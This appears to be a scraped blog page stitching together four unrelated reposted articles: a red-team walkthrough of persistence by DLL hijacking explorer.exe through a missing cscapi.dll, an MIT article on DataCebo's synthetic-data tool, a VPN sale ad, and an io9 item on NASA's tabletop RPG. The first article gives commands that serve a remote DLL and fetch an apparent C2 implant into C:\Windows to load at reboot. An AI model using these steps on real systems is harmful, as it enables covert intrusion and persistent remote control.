...

March 5, 2024

Persistence – Explorer

Persistence – Explorer

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process explorer.exe. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the explorer.exe for results that contain NAME NOT FOUND. One of the missing DLL’s that explorer.exe is missing is the cscapi.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

python3 -m http.server 8080
Python Web Server

A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into C:\Windows path. The tool require the IP address and the port of the server hosting the DLL and the DLL name.

DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll
Explorer.exe – DLL Hijacking
Explorer.exe – cscapi.dll

The arbitrary DLL will load into the explorer.exe process on the next reboot and a communication channel with the Command and Control will established.

Explorer.exe – Implant
Host Enumeration

References

  1. https://github.com/gavz/ExplorerPersist

Source link

Persistence – Explorer Read More »

Using generative AI to improve software testing

Using generative AI to improve software testing

Generative AI is getting plenty of attention for its ability to create text and images. But those media represent only a fraction of the data that proliferate in our society today. Data are generated every time a patient goes through a medical system, a storm impacts a flight, or a person interacts with a software application.

Using generative AI to create realistic synthetic data around those scenarios can help organizations more effectively treat patients, reroute planes, or improve software platforms — especially in scenarios where real-world data are limited or sensitive.

For the last three years, the MIT spinout DataCebo has offered a generative software system called the Synthetic Data Vault to help organizations create synthetic data to do things like test software applications and train machine learning models.

The Synthetic Data Vault, or SDV, has been downloaded more than 1 million times, with more than 10,000 data scientists using the open-source library for generating synthetic tabular data. The founders — Principal Research Scientist Kalyan Veeramachaneni and alumna Neha Patki ’15, SM ’16 — believe the company’s success is due to SDV’s ability to revolutionize software testing.

SDV goes viral

In 2016, Veeramachaneni’s group in the Data to AI Lab unveiled a suite of open-source generative AI tools to help organizations create synthetic data that matched the statistical properties of real data.

Companies can use synthetic data instead of sensitive information in programs while still preserving the statistical relationships between datapoints. Companies can also use synthetic data to run new software through simulations to see how it performs before releasing it to the public.

Veeramachaneni’s group came across the problem because it was working with companies that wanted to share their data for research.

“MIT helps you see all these different use cases,” Patki explains. “You work with finance companies and health care companies, and all those projects are useful to formulate solutions across industries.”

In 2020, the researchers founded DataCebo to build more SDV features for larger organizations. Since then, the use cases have been as impressive as they’ve been varied.

With DataCebo’s new flight simulator, for instance, airlines can plan for rare weather events in a way that would be impossible using only historic data. In another application, SDV users synthesized medical records to predict health outcomes for patients with cystic fibrosis. A team from Norway recently used SDV to create synthetic student data to evaluate whether various admissions policies were meritocratic and free from bias.

In 2021, the data science platform Kaggle hosted a competition for data scientists that used SDV to create synthetic data sets to avoid using proprietary data. Roughly 30,000 data scientists participated, building solutions and predicting outcomes based on the company’s realistic data.

And as DataCebo has grown, it’s stayed true to its MIT roots: All of the company’s current employees are MIT alumni.

Supercharging software testing

Although their open-source tools are being used for a variety of use cases, the company is focused on growing its traction in software testing.

“You need data to test these software applications,” Veeramachaneni says. “Traditionally, developers manually write scripts to create synthetic data. With generative models, created using SDV, you can learn from a sample of data collected and then sample a large volume of synthetic data (which has the same properties as real data), or create specific scenarios and edge cases, and use the data to test your application.”

For example, if a bank wanted to test a program designed to reject transfers from accounts with no money in them, it would have to simulate many accounts simultaneously transacting. Doing that with data created manually would take a lot of time. With DataCebo’s generative models, customers can create any edge case they want to test.

“It’s common for industries to have data that is sensitive in some capacity,” Patki says. “Often when you’re in a domain with sensitive data you’re dealing with regulations, and even if there aren’t legal regulations, it’s in companies’ best interest to be diligent about who gets access to what at which time. So, synthetic data is always better from a privacy perspective.”

Scaling synthetic data

Veeramachaneni believes DataCebo is advancing the field of what it calls synthetic enterprise data, or data generated from user behavior on large companies’ software applications.

“Enterprise data of this kind is complex, and there is no universal availability of it, unlike language data,” Veeramachaneni says. “When folks use our publicly available software and report back if works on a certain pattern, we learn a lot of these unique patterns, and it allows us to improve our algorithms. From one perspective, we are building a corpus of these complex patterns, which for language and images is readily available. “

DataCebo also recently released features to improve SDV’s usefulness, including tools to assess the “realism” of the generated data, called the SDMetrics library as well as a way to compare models’ performances called SDGym.

“It’s about ensuring organizations trust this new data,” Veeramachaneni says. “[Our tools offer] programmable synthetic data, which means we allow enterprises to insert their specific insight and intuition to build more transparent models.”

As companies in every industry rush to adopt AI and other data science tools, DataCebo is ultimately helping them do so in a way that is more transparent and responsible.

“In the next few years, synthetic data from generative models will transform all data work,” Veeramachaneni says. “We believe 90 percent of enterprise operations can be done with synthetic data.”

Source link

Using generative AI to improve software testing Read More »

A lifetime subscription to this reliable VPN is on sale for under £60

A lifetime subscription to this reliable VPN is on sale for under £60

TL;DR: A lifetime subscription to VPN Unlimited is on sale for £55.24, saving you 65% on list price.


Do you have beefing up your online security on your list of 2024 resolutions? If so, it may be time to invest in a good VPN. And the timing couldn’t be better — as you can currently get your hands on a lifetime subscription to one of the most trusted virtual private networks, VPN Unlimited, for the best price online right here. 

With VPN Unlimited, you can take action to keep your online activities safe and secure on all your different devices. For a limited time, you can get this lifetime subscription for just £55.24 — the best price on the web and around £100 off the usual cost. 

As much as we’d love to ditch the internet sometimes, it’s just not possible these days. That means securing yourself online is more important than ever, and VPN Unlimited makes it super easy. Their top-notch encryption algorithms help defend you from hacking or data compromisation, while you can also rest easy knowing you are browsing with complete anonymity, thanks to VPN Unlimited’s privacy safeguards. 

VPN Unlimited offers 3,000 secure servers with more than 80 global locations to hide your IP address and keep you safe from cybercriminals. That variety of locations also comes with the added perk of being able to browse the web without restrictions or borders — which means you can watch content from anywhere, no matter where you are. And this lifetime subscription means you pay once to enjoy all these benefits forever, with wide compatibility for all of your devices. 

Mashable Deals

Stay secure online with a lifetime subscription to VPN Unlimited for just £55.24 for a limited time. 



Source link

A lifetime subscription to this reliable VPN is on sale for under £60 Read More »

NASA Really Made Its Own Tabletop RPG for You to Play

NASA Really Made Its Own Tabletop RPG for You to Play

The Lost Universe gameplay instructional booklet art

NASA still has plenty of cool projects afoot in the real world—did you hear about that asteroid-redirecting test? Or those space-friendly cameras?—but it’s also trying to stir imaginations in fantastically creative ways, too. Enter The Lost Universe, the agency’s first-ever tabletop roleplaying game.

Its first what now? Yes, a TTRPG crafted at NASA’s Goddard Space Flight Center, with a gameplay instructional booklet currently available for free download here (plus a Tolkien-esque map); it’s for 4-7 level 7-10 characters, and is touted as being compatible which whichever game system you prefer for gathering parties and venturing forth. Here’s the pitch: “A dark mystery has settled over the city of Aldastron on the rogue planet of Exlaris. Researchers dedicated to studying the cosmos have disappeared, and the Hubble Space Telescope has vanished from Earth’s timeline. Only an ambitious crew of adventurers can uncover what was lost. Are you up to the challenge?”

There’s an educational element lurking here—“take on a classic villain (while also using and learning science skills!) as you overcome challenges and embark on an exciting quest to unlock more knowledge about our universe”—which feels both obvious as well as something that cleverly exploits the Venn diagram encompassing “TTRPG fans” and “science lovers.” Which is to say, a lot of folks!

NASA shared a video for added excitement, which you can see below. Will you be blasting off to The Lost Universe?

Welcome to The Lost Universe: NASA’s First Tabletop Role-playing Game


Want more io9 news? Check out when to expect the latest Marvel, Star Wars, and Star Trek releases, what’s next for the DC Universe on film and TV, and everything you need to know about the future of Doctor Who.

Source link

NASA Really Made Its Own Tabletop RPG for You to Play Read More »

Scroll to Top
Seraphinite AcceleratorOptimized by Seraphinite Accelerator
Turns on site high speed to be attractive for people and search engines.